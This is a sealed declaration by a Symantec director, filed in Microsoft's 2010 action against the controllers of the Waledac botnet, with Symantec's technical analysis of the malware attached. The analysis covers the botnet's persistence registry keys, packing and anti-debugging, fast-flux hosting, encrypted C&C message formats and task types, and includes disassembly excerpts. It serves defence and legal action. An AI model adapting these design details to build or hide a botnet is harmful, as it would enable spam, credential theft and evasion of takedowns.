**IN THE UNITED STATES DISTRICT COURT**
**FOR THE EASTERN DISTRICT OF VIRGINIA**
**Alexandria Division**

| | |
|---|---|
| MICROSOFT CORPORATION, a Washington corporation, ) ) ) | |
| Plaintiff, ) ) | |
| v. ) ) | Civil Action No: 1:10CV 156 (LMB)(JFA) |
| JOHN DOES 1-27, CONTROLLING A COMPUTER BOTNET THEREBY INJURING MICROSOFT AND ITS CUSTOMERS ) ) ) ) | |
| ) | **FILED UNDER SEAL** |
| Defendants. ) ) ) ) ) ) ) ) ) ) | |

---

**DECLARATION OF DEAN TURNER IN SUPPORT OF APPLICATION OF MICROSOFT CORPORATION FOR AN EMERGENCY TEMPORARY RESTRAINING ORDER AND ORDER TO SHOW CAUSE RE PRELIMINARY INJUNCTION**

I, Dean Turner, declare as follows:

1.      I am a Director with Symantec Corporation.  I make this declaration in support of the Application of Microsoft Corporation for an Emergency Temporary Restraining Order and Order to Show Cause Re Preliminary Injunction.  I make this declaration of my own personal knowledge and, if called as a witness, I could and would testify competently to the truth of the matters set forth herein.

2.      Symantec Corporation is a provider of security, availability and compliance products and services and is considered an authoritative source on matters pertaining to internet security threats.

3.      I am a Director within Symantec Global Intelligence Network with over 10 years

experience in assessing internet security threats and providing briefings and analysis throughout the industry, government and the private sector. I am also a regular contributor to pan-industry security organizations and a contributor to United States Federal Government working groups in this area.

## Overview Of Botnets

4.      A "bot" is a type of malware that allows an attacker to take control over an affected computer. Botnets are collections of hundreds or thousands or more of these compromised computers (sometimes referred to as "zombies") owned by regular people and secretly controlled by cybercriminals.

5.      Some botnets might have a few hundred or a couple thousand computers, but others have tens and even hundreds of thousands of zombies at their disposal. Most of these computers are infected without their owners' knowledge.

6.      Cybercriminals can tell their botnet armies to install spyware like keystroke logging malware, and to report back sensitive information, such as banking login passwords or credit card numbers. From our research, we believe that much of the stolen data bought and sold in the underground economy is provided by these botnets.

7.      Botnets can also attack. In 2007 the Internet in Estonia was shut down due to denial-of-service attacks carried out by botnets, and Georgia was severely disabled by Russian botnets in 2008. Other than taking entire countries offline, botnets could potentially disable news sources, transportation websites, or overpower other highly important web sites.

8.      A botnet is a group of compromised computers, all controlled by one criminal or criminal organization. To facilitate this control, botnets have means for the controller to issue commands, retrieve stolen information, conduct reconnaissance into the networks of individual botnet nodes, and more. These means are commonly referred to as the "command and control" structure of the botnet. Command and Control mechanisms (or C&C) vary in implementation. The most common protocols for C&C are IRC, HTTP, and various Peer to Peer (P2P) protocols.

9.      In addition to the infected nodes and one or more C&C methods and servers,

many botnets will include collection servers for stolen data and credentials, dedicated DNS servers, and failover servers for any of the above.

10.     Botnets are grown via the infection of more and more victim computers with the bot software. This is accomplished by a variety of means, the most common being social engineering, vulnerability exploitation, and leveraging of pre-existing infections on the victim computer.

11.     Social engineering methods may include emails sent to users with executable attachments, meant to entice the user into running the attachment, or content on a website that entices the user to download and run a program. (For example, "You need to install this codec to view the video you have requested").

12.     Vulnerability exploitation may take many forms, and exploits often are deployed to compromised websites in order to take advantage of vulnerabilities in web browsers and associated plugins. The exploit may also be emailed from infected computers.

13.     Less common, although not rare, is the usage of other botnets or malicious code to "seed" a botnet from an existing botnet or group of compromised systems.

14.     Botnet activities are largely limited only to the imagination of the criminals who control them. Common activities are denial of service attacks against corporate and government networks or servers, the theft of credentials and financial information from the infected systems, sending or relaying spam and phishing emails,[1] propagation and growth of the botnet via attacks or email campaigns, and hosting websites affiliated with any of the above (phishing sites, for example).

15.     Credible evidence indicates that botnets are often controlled by sophisticated, organized criminal "gangs" who participate in a global, well developed underground economy. These gangs operate in some ways similar to legitimate businesses, in that specific tasks may be

---

[1] "Phishing" is a form of fraud by which users are enticed to enter personal financial information or other personal information, which malicious actors then use to profit themselves and injure the victim.

TURNER DECLARATION RE APPLICATION
FOR TRO AND PRELIMINARY INJUNCTION

outsourced, products and services are offered in a free market, and incentives and value-adds are offered to "customers." These gangs are quick to adapt to new technologies, new Law Enforcement tactics, and new opportunities. Often, the controllers of a botnet will rent access to the botnet for specific tasks, and may even sell off sections of the botnet.

### The Waledac Botnet

16.     W32.Waledac (W32.xx is Symantec's threat designation) is a worm that uses social engineering and certain client side vulnerabilities in order to propagate. The worm has functionality to download and execute binaries, act as a network proxy, send spam, mine infected computers for data, such as email addresses and passwords, and perform denial of service (DoS) attacks. Symantec started noticing a burst in W32.Waledac activity around the third week of December in 2008. At that time it began spamming Christmas-themed emails and turning compromised computers into spam bots.

17.     The first variant of W32.Waledac was discovered in April 2008 and this variant was delivered by the mechanisms that were used to deliver W32.Peacomm components. This event linked W32.Waledac to W32.Peacomm; however, the nature of the relationship between W32.Waledac and W32.Peacomm is not known. W32.Waledac was also associated with W32.Downadup; on April 8, 2009, W32.Downadup.C received two update binaries through a peer-to-peer channel. One of these binaries was an update for W32.Downadup.C; the other was a copy of W32.Waledac3. This was a significant event in the security community as it connected W32.Waledac to W32.Downadup. However, the nature of this relationship is not yet fully understood.

18.     More recently, the Waledac binary has been downloading and installing misleading security applications. These threats use fake system error messages and pornographic pop-up windows to scare a victim into paying a license to remove the false threats.

19.     The main purpose of W32.Waledac is to send spam, to propagate itself, and to download additional files on to compromised computers. The spam functionality of W32.Waledac serves a dual purpose: it uses spam to both spread itself and to market dubious

products. The main propagation method is achieved by sending emails containing links to copies of itself. It tries to entice users with social engineering techniques, such as using holiday themes related to Christmas or Valentine's Day, topical news like the new US president, and fake news of bombing incidents that use geographical proximity to make the news report seem more sensational. The authors make the malicious Web sites hosting the malware look convincing so that a victim will trust the site. The worm has been known to use Web pages that appear to mimic sites, such as the official Obama-Biden campaign site, news articles from popular news sites, and most recently a legitimate SMS tool. The worm gets installed when the user clicks on the malicious link and runs the downloaded file.

20.     W32.Waledec Web sites have also been seen serving various browser vulnerabilities. This is done so it can install itself on to a victim's computer when the site is visited so even if the victim does not download or run the malicious binary, their computer could still be successfully attacked if it is vulnerable to the exploits that W32.Waledac uses. Fortunately, most of the vulnerabilities used by W32.Waledac are not new and the respective vendors have already patched them. Hence, users who regularly update their applications and computers are likely to be protected from the exploits. There are instances however when W32.Waledac Web sites do not contain exploits at all. Nevertheless, they still house malicious binaries that pose a danger to unsuspecting users.

21.     W32.Waledac is also known to send spam that does not contain any links to copies of itself but instead promotes questionable products or services ranging from questionable job offers, to performance enhancing pharmaceuticals, to online casino games. This leads Symantec to believe that the author intended to use this malware for financial gain. The author or authors either signed up as an ad affiliate for the product or services being promoted in the spam mails, or they leased the botnet to parties interested in using it to spread spam.

22.     In addition to the above functionalities, this malware is also capable of downloading arbitrary files and installing them on to the compromised computer. An example is the misleading applications that have been downloaded and installed on compromised

computers.

### Waledac Topology

23.     As mentioned above, a system compromised by a bot agent is usually referred to

as a zombie.  There are generally two types of zombies in the W32.Waledac botnet, and the type

of zombie is determined when the zombie bootstraps to the botnet.  If a zombie is publicly

accessible and has very good bandwidth, the more likely it is to act as a HTTP and DNS proxy

server for the botnet.  These zombies are known as " relay nodes."  In contrast, a non-proxy

zombie will be referred to as a slave node.

24.     Relay nodes basically act as an intermediary between the slave nodes and the

master C&C servers, as well as for each other.  With the help of these relay nodes, Waledac is

able to implement blind proxy redirection as another armoring tactic to protect the botnet from

full enumeration and complete shutdown.  This figure depicts a sample illustration of Waledac's

network topology:



25.     Furthermore, the hardcoded IP list embedded in a W32.Waledac binary is actually

a list of relay nodes that is used by a new node to bootstrap to the network. Given that a relay node is also a compromised system, it is likely to be taken offline from the botnet when the infection is discovered and removed. For this reason, Waledac has to replace the list that it embeds on its binaries after a certain time, since offline relay nodes will obviously be useless in bootstrapping a new node into the botnet. Essentially, Waledac uses redundancy to ensure that in case of failure, there is still at least one alternative path available from one point to another.

26.     A Waledac node updates its peer IP list using two methods. So in the event that one method fails, there is a backup method it can use. The first method involves an IP list exchange with another node. For example, a Waledac slave node randomly selects 100 relay nodes from its locally stored list and then attempts to connect with one of the relay nodes. Once a connection is established, the relay node constructs a list of 100 relay nodes in its own stored list, and exchanges it with the slave node. After they receive the list, they update their locally stored list by replacing older entries with newer ones.

27.     In the second method, a Waledac slave node updates its IP list by connecting to a hardcoded Waledac domain after 10 minutes, and fetching a list of active relay nodes using a GET request for an index.php file. The list received typically contains up to a maximum of 500 entries. After receiving the list, the slave node would once again update its locally stored list. This hardcoded domain usually turns out to be a fast-fluxed domain. So in a short period of time, the Web site host can resolve to multiple IP addresses. There is a good possibility that these hosts are compromised as well.

28.     Waledac makes use of fast-flux hosting for its domains. Meaning that, in a short period of time, one Waledac domain can resolve to multiple hosts that are most likely just acting as proxies. A fast-flux DNS system makes it harder to track the source and as a consequence, it is not easy to completely shut down. Evidently, it is meant as another defense mechanism for the Waledac network.

29.     The figure below depicts the work of fast-flux service networking. It shows the results of DNS dig queries for one of Waledac's domain during its "dirty bomb" campaign back

TURNER DECLARATION RE APPLICATION
FOR TRO AND PRELIMINARY INJUNCTION

in March, 2009. Notice that in spite of the queries being launched only four seconds apart, the returned IP address for the host in the second query is already different from that of the first query.



30.    The domains that are set up for fast flux are used primarily to spread the malicious code. The sites hosted at these domains will attempt to exploit various vulnerabilities, and will also offer the malicious code as a download (with an alternate description of the program, of course – often a greeting card application, or a fake security/antivirus application, for example). Given the nature of Fast Flux technology, it is very difficult to lock down these

domains at the server or ISP level.  Conceivably, any of the tens of thousands of nodes could be a web server or DNS server providing any or all of these domains.  The most reliable and effective means of removing these domains from the botnet is to seize control of the domain names themselves.



31.    Fast Flux technology such as that employed within Waledac ensures that any domain tracked to an IP address will be at a different IP address by the time any action is taken against the first. The sheer number of infected nodes guarantees that new hosts can be added to the fast flux routine more rapidly than they can be removed or filtered by ISPs. The only technologically feasible way to take these sites down is to seize them at both the registry and registrar levels. This will prevent lookups for those domains from being relayed to the attacker-controlled DNS servers.

32.    Exhibit A to this declaration is a true and correct copy of a whitepaper on Win32.Waledac published by Symantec on September 1, 2009.

33.    Exhibit B to this declaration is a true and correct copy of statistics on Win32. Waledac provided by Symantec as observed on Symantec's Global Intelligence Network.


I declare under penalty of perjury under the laws of the United States of America that the foregoing is true and correct to the best of my knowledge.

Executed this _18_ day of February, 2010.

_____
Dean Turner

# Exhibit A

symantec. Security Response

# W32.Waledac
## Threat Analysis

Gilou Tenebro
Software Engineer

## Contents

Introduction ........................................................ 1
Waledac Binary ................................................. 2
Initial W32.Waledac Installation ....................... 3
Communications ............................................... 5
Appendix A ...................................................... 17
Appendix B ...................................................... 21
Appendix C ...................................................... 23
References ....................................................... 25
Bibliography .................................................... 26

## Introduction

W32.Waledac is a worm that uses social engineering and certain client side vulnerabilities in order to propagate. The worm has functionality to download and execute binaries, act as a network proxy, send spam, mine infected computers for data, such as email addresses and passwords, and perform denial of service (DoS) attacks. Symantec started noticing a burst in W32.Waledac activity around the third week of December in 2008. At that time it began spamming Christmas themed emails and turning compromised computers into spam bots[1].

The first variant of W32.Waledac was discovered in April 2008 and this variant was delivered by the mechanisms that were used to deliver W32.Peacomm components[2]. This event linked W32.Waledac to W32.Peacomm; however, the nature of the relationship between W32.Waledac and W32.Peacomm is not known. W32.Waledac was also associated with W32.Downadup; on April 8, 2009, W32.Downadup.C received two update binaries through a peer-to-peer channel. One of these binaries was an update for W32.Downadup.C; the other was a copy of W32.Waledac[3]. This was a significant event in the security community as it connected W32.Waledac to W32.Downadup. However, the nature of this relationship is not yet fully understood.

More recently, the Waledac binary has been downloading and installing misleading security applications. These threats use fake system error messages and pornographic pop-up windows to scare a victim into paying a license to remove the false threats.

The main purpose of W32.Waledac is to send spam, to propagate itself, and to download additional files on to compromised computers. The

spam functionality of W32.Waledac serves a dual purpose: it uses spam to both spread itself and to market dubious products. The main propagation method is achieved by sending emails containing links to copies of itself. It tries to entice users with social engineering techniques, such as using holiday themes related to Christmas[4] or Valentine's day[5], topical news like the new US president[6], and fake news of bombing incidents that use geographical proximity to make the news report seem more sensational[7]. The authors make the malicious Web sites hosting the malware look convincing so that a victim will trust the site. The worm has been known to use Web pages that appear to mimic sites, such as the official Obama-Biden campaign site, news articles from popular news sites, and most recently a legitimate SMS tool. The worm gets installed when the user clicks on the malicious link and runs the downloaded file.

W32.Waledec Web sites have also been seen serving various browser vulnerabilities. This is done so it can install itself on to a victim's computer when the site is visited so even if the victim does not download or run the malicious binary, their computer could still be successfully attacked if it is vulnerable to the exploits that W32.Waledac uses. Fortunately, most of the vulnerabilities used by W32.Waledac are not new and the respective vendors have already patched them. Hence, users who regularly update their applications and computers are likely to be protected from the exploits. There are instances however when W32.Waledac Web sites do not contain exploits at all. Nevertheless, they still house malicious binaries that pose a danger to unsuspecting users.

W32.Waledac is also known to send spam that does not contain any links to copies of itself but instead promotes questionable products or services ranging from questionable job offers, to performance enhancing pharmaceuticals, to online casino games. This leads me to believe that the author intended to use this malware for financial gain. The author or authors either signed up as an ad affiliate for the product or services being promoted in the spam mails, or they leased the botnet to parties interested in using it to spread spam.

In addition to the above functionalities, this malware is also capable of downloading arbitrary files and installing them on to the compromised computer. An example is the misleading applications that have been downloaded and installed on compromised computers.

# Waledac Binary

This section describes the Waledac binary, installation properties, and how the bot bootstraps onto the Waledac bot network.

## Packer

The W32.Waledac binary is packed by several packers to hinder analysis and detection. Binary packing is a process where an executable file is processed by a "packer" and the result is an obfuscated binary. Depending on the packer that is used, packed binaries can be very difficult for security professionals to analyze because they require that the binary be unpacked before analysis can proceed. Anti-unpacking techniques are functionalities that are employed by the packer to prevent the binary from being unpacked. The first layer of packing on Waledac is UPX (a freely available packer), the second layer is a custom packer. During the unpacking process for the second layer of packing, the malware gradually reconstructs the instructions of the core program and passes control to it. The writing of the unpacked instructions happens in stages, so that the same memory location can change several values before it is finally assigned the correct value. These writing cycles are interspersed with other instructions, most of which aim to complicate the manual unpacking process.

Two of the techniques that Waledac uses to complicate its unpacking are worth noting. First, code obfuscation is achieved with a large number of jump instructions that frequently redirect code execution along with several call chain loops. Call chain loops start within a function that contains a call to another function, which in turn calls another function until a call is made to the initial function, completing the loop. Most of the functions in the loop do not actually make use of a return instruction to return the execution back to the function that called them. Instead, they just keep calling the next function in the loop and pass control to it. This hampers some function analysis because there is no return instruction marking an exit point for analysis.

Waledac's packer also has anti-debugging mechanisms and functions that allows it to detect stepping done by a debugger. If detected, Waledec creates a code path that eventually leads to an invalid instruction.

W32.Waledac

Interestingly, the packer used by W32.Waledac.F is different from the packer used by the older versions of the worm. While the older packer also uses a number of anti-unpacking techniques, the two techniques documented above are new to the W32.Waledac.F version.

# Initial W32.Waledac Installation

When the malware executes, it creates a window named fhfhkjfhwefkwj and registers itself with the class name jfkljfilfj23fi32io. As a self-starting mechanism, it also adds one of the following registry entries so it can run whenever Windows starts:

- `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"PromoReg"` = `"[PATH TO EXECUTABLE]"`
- `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"PromoReg"` = `"[PATH TO EXECUTABLE]"`

Being a spambot, this malware also collects email addresses by searching files in fixed and removable drives, except however for files with the extensions shown in table 1.

W32.Waledac then uses the registry to store configuration data. Under the "`HKEY_CURRENT_USER\Software\Micro-soft\Windows\CurrentVersion`" registry key, this malware creates four more values: FWDone, LastCommandId, MyID, and RList.

FWDone is a flag that is set to "74 72 75 65" when the malware succeeds in connecting to the internet and one of its peers. The string "74 72 75 65" actually equates to the ASCII string "true". LastCommandId is used to store the hexadecimal equivalent of the ID number of the last command that the malware received and executed. The MyID registry entry contains a 16-byte hexadecimal number that is randomly generated to uniquely identify

| Table 1 | | | |
|---------|---------|---------|---------|
| **File name extensions skipped by Waledac when harvesting email addresses** | | | |
| .7z | .gz | .jpg | .vob |
| .avi | .hxd | .mov | .wav |
| .bmp | .hxh | .mp3 | .wave |
| .class | .hxn | .msi | .wma |
| .dll | .hxw | .ocx | .wmv |
| .exe | .jar | .ogg | .zip |
| .gif | .jpeg | .rar | |

the node in the botnet. The term "node" here refers to the bots that W32.Waledac controls. Lastly, the RList value is an obfuscated IP list that is used by the bot as a list of other peers. The RList value data is an XML for-matted list that has been compressed using Bzip2 and encrypted using AES. Figure 1 illustrates how the original XML list is transformed into the encoded data we see for the RList registry value.

Figure 1

**RList data compressed, encrypted and stored in the registry**



The data in the RList registry entry is initially populated from a list of IPs of Waledac nodes that is hardcoded into the binary. This list may vary per infection. Each entry in the hardcoded list of nodes has two components: a node ID and the corresponding node IP address. When the malware runs, it initially builds the XML node IP list based on these hardcoded entries by adding tags, a time stamp, and an HTTP port element. For example, a five-node IP XML list will have the format shown in figure 2.

Figure 2

## A sample of a five-node IP list



The malware randomly picks a node IP from the hardcoded list and converts it into XML format by adding tags and elements. Next, it compresses the XML list with bzip2 and then encrypts it with the Advanced Encryption Standard (AES) cipher, storing the result into the RList registry value. It then fetches another node at random, converts it to XML format and then prepends this new node into the previous XML list and changes the time value in between the localtime tags into that of the latest entry. After the new XML node IP list is generated, bzip2 and AES is applied on it again and the new value replaces the previous value stored in RList. These steps will be repeated all over again until the new list is finished. The IP list in RList can contain up to a maximum number of 500 nodes in it. This maximum number is retained even when the list is updated. When a full list is updated, old nodes are simply replaced with newer nodes, so consequently the last entries in the list are usually the first ones to go.

# W32.Waledac bootstrapping and topology

A system compromised by a bot agent is usually referred to as a zombie. There are generally two types of zombies in the W32.Waledac botnet, and the type of zombie is determined when the zombie bootstraps to the botnet. If a zombie is publicly accessible and has very good bandwidth, the more likely it is to act as a HTTP and DNS proxy server for the botnet. For the rest of this paper, a proxy zombie will be referred to as a relay node. In contrast, a non-proxy zombie will be referred to as a slave node.

Relay nodes basically act as an intermediary between the slave nodes and the master C&C servers, as well as for each other. With the help of these relay nodes, Waledac is able to implement blind proxy redirection as another armoring tactic to protect the botnet from full enumeration and complete shutdown. Figure 3 depicts a sample illustration of Waledac's network topology.

Furthermore, the hardcoded IP list embedded in a W32.Waledac binary is actually a list of relay nodes that is used by a new node to bootstrap to the network. Given that a relay node is also a compromised system, it is likely to be taken offline from the botnet when the infection is discovered and removed. For this reason, Waledac has to replace the list that it embeds on its binaries after a certain time, since offline relay nodes will obviously be useless in bootstrapping a new node into the botnet. Essentially, Waledac uses redundancy to ensure that in case of failure, there is still at least one alternative path available from one point to another.

## Node IP list updates

A Waledac node updates its peer IP list using two methods. So in the event that one method fails, there is a backup method it can use. The first method involves an IP list exchange with another node. For example, a Waledac slave node randomly selects 100 relay nodes from its locally stored list and then attempts to connect with one of the relay nodes. Once a connection is established, the relay node constructs a list of 100 relay nodes in its own stored list, and exchanges it with the slave node. After they receive the list, they update their locally stored

symantec. | Security Response

list by replacing older entries with newer ones.

In the second method, a Waledac slave node updates its IP list by connecting to a hardcoded Waledac domain after 10 minutes, and fetching a list of active relay nodes using a GET request for an index.php file. The list received typically contains up to a maximum of 500 entries. After receiving the list, the slave node would once again update its locally stored list. This hardcoded domain usually turns out to be a fast-fluxed domain. So in a short period of time, the Web site host can resolve to multiple IP addresses. There is a good possibility that these hosts are compromised as well.

Figure 3

## An illustration of Waledac's network topology



## Fast-flux network

As mentioned previously, Waledac makes use of fast-flux hosting for its domains. Meaning that, in a short period of time, one Waledac domain can resolve to multiple hosts that are most likely just acting as proxies. A fast-flux DNS system makes it harder to track the source and as a consequence, it is not easy to completely shutdown. Evidently, it is meant as another defense mechanism for the Waledac network.

Figure 4 depicts the work of fast-flux service networking. It shows the results of DNS dig queries for one of Waledac's domain during its "dirty bomb" campaign back in March, 2009. Notice that in spite of the queries being launched only four seconds apart, the returned IP address for the host in the second query is already different from that of the first query.

### Server-side Polymorphism

Similar to what Peacomm (a.k.a. Storm) did during its run, Waledac regularly repacks the executable binaries housed in its malicious domains, and consequently achieves server-side polymorphism. For example, during Waledac's 4th of July campaign, we observed it repacking its binaries every ten minutes. In its bid to evade file based detections, it changes the multilayered encryptions and protections that are wrapped around its executable.

# Communications

In this section we will discuss how the Waledac bot nodes communicate with the bot network. The nodes in the W32.Waledac network use HTTP requests and responses to communicate between peers and to update its spam campaigns.

To establish a connection with a node, Waledac opens a random local port on the compromised computer and attempts to connect to port 80 of the remote W32.Waledac relay node. The message goes through at least four transformations before being sent to its peer. Anybody monitoring the HTTP packets on the wire will not easily be able to comprehend the messages.

symantec. Security Response

Figure 4

**Outputs of dig queries launched about four seconds apart for the same fast-fluxed Waledac domain**



In communicating with other nodes, this malware uses HTTP POST and GET messages. Except for the headers, the contents of the HTTP messages are usually obfuscated. An example of an HTTP POST request and response message exchange between two Waledac nodes is shown in figure 5. The top part is the request portion, while

the bottom part is the response portion. As you can see, the encrypted message data can be seen in the "a" URI parameter of the POST request, and is followed by the "b" URI parameter. On the contrary, the response to the POST request does not use these URIs.

Figure 5

## Waledac message exchange



# Waledac node message format

The plaintext message format used by W32.Waledac follows an XML structure. The root element is *lm* so all W32.Waledac messages are enclosed with this root start-tag and root end-tag. Table 2 contains some of the major elements that can be found inside most of the obfuscated messages. For a more comprehensive list of XML elements, please refer to Appendix C.

## Waledac message encoding

As mentioned earlier, a Waledac node message goes through several transformation stages before it is transported. This is most likely an attempt to secure botnet data and thwart potential eavesdroppers.

### Bzip2 compression

The XML form of the malware's message is compressed with bzip2 before it is encrypted because the compression helps minimize the size of the message.

A compressed bzip2 stream always begins with the magic hex bytes "42 5A 68" or "BZh" in ASCII. In fact, you may have noticed these magic bytes in the bzip2 compressed form of the sample that was shown in figure 1.

### AES-128-CBC encryption

After a message is packed with bzip2, Waledac encrypts the compressed form with the Advanced Encryption Standard (AES), which is a symmetric block cipher algorithm. This malware uses 128-bit (16-byte) keys and Cipher Block Chaining (CBC) mode. After the key schedule routine is applied to a key, it is expanded into an array of 44 word-sized values. The expanded keys are then saved into heap memory to be later used for encryption. Conversely, Waledac also precomputes the inverse of each expanded key and saves them near the same area in heap memory so they can be used for decryption later on.

| Table 2 | |
|---|---|
| **Some of Waledac's major XML elements** | |
| **Element** | **Description** |
| l | 16-byte hex ID number |
| lm | Root element; starts and ends a message |
| localtime | System time in Unix format |
| node | Contains a node IP address, port number, and time |
| nodes | Encloses a list of nodes |
| props | Main message body and may contain several elements |
| r | Flag to indicate node type: r=1 for a relay-node r=0 for a slave-node |
| t | Task name: getkey, first, notify, taskreq, words, taskrep, httpstats, emails, creds |
| v | Version number |
| words | Spam template component |

### Base64 encoding and some character substitutions

Waledac uses a slight modification of base64 encoding to transport data over the network. After the message is transformed using standard base64 encoding the malware further transforms the encoded message by substituting some characters and removing any padding at the end. It searches for '+' characters in the base64 output and replace it with '-'. Next, it searches for '/' characters and replace it with '_'. Lastly, it searches for "=" characters, which are normally found at the end of a padded base64 form, and replaces them with "_". Later on, the trailing "_" characters at the end are discarded, which in effect removes the original padding that base64 added.

### RSA keys and x.509 certificates

To establish a connection, a slave node generates a new 1024-bit RSA public and private key pair on initialization. It then uses the public key to create a self-signed x.509 certificate (see figure 6 for an example) and initiates a handshake by sending a *getkey* (described later) message. The newly generated self-signed certificate will always have a validity period of one year, and the subject field will always be set to "C=UK, CN=OpenSSL Group". When a connection is successfully established, the slave node then receives a base64 encoded, RSA encrypted session key that is used to AES-encrypt the messages that follow. A flowchart illustrating how Waledec constructs bot communications is shown in figure 7.

## Waledac Message Types

There are 2 types of messages that the bot can use, the message could either contain a list of IP addresses so that Waledac can update its list of Waledac nodes (IP List message) or a task for the bot to execute (task message). Messages are sent using the HTTP protocol and the header of the HTTP requests use "Mozilla" as a Referer and/or User-Agent string. This is done to make it look like the W32.Waledac traffic came from a Mozilla browser. It is just another attempt to hide its presence and avoid suspicion.

Figure 6
## Sample of a self-signed certificate generated by W32.Waledac



## Task Messages

A task message poses as a HTTP POST request for a PNG or HTM file that has a filename length of between 3-12 random letters. The encrypted task message data is contained in a URI parameter named "a". If the sender of the task message is a slave node, a URI parameter called "b" is included, the value for this parameter is a base64 encoded null string "AAAAAA". Alternately, if the task message sender is a relay node, the URI parameter value for "b" would be the base64 encoded IP address . The response data will be obfuscated and the response headers would appear to come from an nginx/0.6.34 server (see table 7 in Appendix B).

One thing that differentiates a task message from an IP list message is the header that is attached to its variable-sized AES-encrypted data, right before it is transformed using base64 encoding. Thus, the task message body will have the format:

```
[byTaskID (BYTE), dwDecSize (DWORD), task-
Data (Variable size)]
```

The value dwDecSize will be in network byte-order and specifically refers to the decrypted size of the message attached to the header. Figure 8 shows an illustration of a message containing a header.

## IP List Messages

Unlike the task messages, an IP List message data does not contain URI parameters or a prefixed header. Further-more, an IP list exchange by HTTP POST has two

Figure 7
## Message transformation process



With a task header          Without a task header

Figure 8
**A sample message with a task header**



kinds, depending on the request type. It may either contain a list of relay nodes or a list of proxied C&C servers. A POST header containing a "X-Request-Kind-Code: nodes" line is a typical request used by a slave node to exchange an IP list of relay nodes with one of the relay nodes in its locally stored list. On the other hand, a POST header containing a "X-Request-Kind-Code: servers" line is a request used by a relay node to exchange an IP list of proxied C&C servers with another relay node.

## Task Message Types

At present, there are nine types of tasks classified by the first byte in the header of encrypted task messages. Table 3 shows the current possible values. Each value corresponds to a specific task type, which in turn has different message formats.

For more details on what information the task messages may contain, please refer to Appendix C.

The *creds* task actually did not exist until the later variants of Waledac. Before that, Waledac only had the first eight task types. At the time of writing, the earliest sample seen by this researcher that had the added *creds* task was received around February, 2009. It is possible that it may have started earlier than that though.

Table 3
**A list of TaskID types**

| TaskID | Task Type | Description |
|--------|-----------|-------------|
| 0xFF | getkey | Self-signed certificate and session key exchange |
| 0x01 | first | Sender label and Windows version number |
| 0x02 | notify | Startup time, current system time, sender label and IP address, DNS server name and IP address, SMTP server IP address, http cache timeout value, number of sender threads and queue, and a download or update command |
| 0x03 | taskreq | Spam task email templates and list of recipients |
| 0x04 | words | Word lists related to a spam task |
| 0x05 | taskrep | A report on the executed spam task |
| 0x06 | httpstats | Connection logs of the relay node |
| 0x07 | emails | Harvested email addresses |
| 0x08 | creds | Harvested login information |

See figure 9 for an example. The routine jump table at the top came from one of the samples we received in late December, 2008. In contrast, the jump table shown at the bottom of figure 9 came from a sample we received in late February, 2009. Through this, you will notice that the creds task was not a functionality of Waledac until the later variants. If you are wondering about the "unknown command" indicated in the jump tables in figure 9, this merely refers to Waledac's bootstrap routine of exchanging and updating its IP list. It is the one responsible for generating the IP list messages.

Task messages are mainly used by W32.Waledac to distribute spam templates or word lists for its spam campaigns, to send reports, and to collect stolen information. What follows is a typical example of transactions that occur between a slave node and relay node.

Firstly, in a *getkey* task operation, a slave node tries to initiate a handshake with a relay node by sending a message containing a self-signed certificate. The relay node then responds back with a session key that is used to encrypt succeeding messages between both nodes. Once a session is established, the slave node executes a *first*

symantec. | Security Response

Figure 9

## A comparison of jump tables used by Waledac variants

```
4295EA    51              PUSH ECX
          832424 00       AND DWORD PTR SS:[ESP],0
          83F8 07         CMP EAX,7
          77 3F           JA SHORT 10F0_6F0.00429439
4295EA    FF2485 4C944200 JMP DWORD PTR DS:[EAX*4+42944C]
          68 00F04C00     PUSH 10F0_6F0.004C9E00          ASCII "getkey"
          EB 36           JMP SHORT 10F0_6F0.0042943E
          68 08F04C00     PUSH 10F0_6F0.004C9E08          ASCII "first"
          EB 2F           JMP SHORT 10F0_6F0.0042943E
          68 10F04C00     PUSH 10F0_6F0.004C9E10          ASCII "notify"
          EB 28           JMP SHORT 10F0_6F0.0042943E
          68 18F04C00     PUSH 10F0_6F0.004C9E18          ASCII "taskreq"
          EB 21           JMP SHORT 10F0_6F0.0042943E
          68 20F04C00     PUSH 10F0_6F0.004C9E20          ASCII "words"
          EB 1A           JMP SHORT 10F0_6F0.0042943E
          68 28F04C00     PUSH 10F0_6F0.004C9E28          ASCII "taskrep"
          EB 13           JMP SHORT 10F0_6F0.0042943E
          68 30F04C00     PUSH 10F0_6F0.004C9E30          ASCII "httpstats"
          EB 0C           JMP SHORT 10F0_6F0.0042943E
          68 3C9E4C00     PUSH 10F0_6F0.004C9E3C          ASCII "emails"
          EB 05           JMP SHORT 10F0_6F0.0042943E
          68 449E4C00     PUSH 10F0_6F0.004C9E44          ASCII "unknown comman
          88CE            MOV ECX,ESI
          EB 4581FDFF     CALL 10F0_6F0.0040158A
          88C6            MOV EAX,ESI
          59              POP ECX                         kernel32.7C00B508
          C3              RETN
```
**Jump table of earlier variants of Waledac**

```
          51              PUSH ECX
4295DA    832424 00       AND DWORD PTR SS:[ESP],0
4295DE    83F8 08         CMP EAX,8
4295E1    77 46           JA SHORT 10F0_6F6.00429629
          FF2485 3996420  JMP DWORD PTR DS:[EAX*4+429639]  10F0_6F6.004295EA
4295EA    68 28004D00     PUSH 10F0_6F6.004D0028          ASCII "getkey"
          EB 30           JMP SHORT 10F0_6F6.0042962E
          68 30004D00     PUSH 10F0_6F6.004D0030          ASCII "first"
          EB 36           JMP SHORT 10F0_6F6.0042962E
          68 38004D00     PUSH 10F0_6F6.004D0038          ASCII "notify"
          EB 2F           JMP SHORT 10F0_6F6.0042962E
          68 40004D00     PUSH 10F0_6F6.004D0040          ASCII "taskreq"
          EB 28           JMP SHORT 10F0_6F6.0042962E
          68 48004D00     PUSH 10F0_6F6.004D0048          ASCII "words"
          EB 21           JMP SHORT 10F0_6F6.0042962E
          68 50004D00     PUSH 10F0_6F6.004D0050          ASCII "taskrep"
          EB 1A           JMP SHORT 10F0_6F6.0042962E
          68 58004D00     PUSH 10F0_6F6.004D0058          ASCII "httpstats"
          EB 13           JMP SHORT 10F0_6F6.0042962E
          68 64004D00     PUSH 10F0_6F6.004D0064          ASCII "emails"
          EB 0C           JMP SHORT 10F0_6F6.0042962E
          68 6C004D00     PUSH 10F0_6F6.004D006C          ASCII "creds"  ←Added
          EB 05           JMP SHORT 10F0_6F6.0042962E
          68 74004D00     PUSH 10F0_6F6.004D0074          ASCII "unknown connane
          88CE            MOV ECX,ESI
          E8 5E7FFDFF     CALL 10F0_6F6.00401593
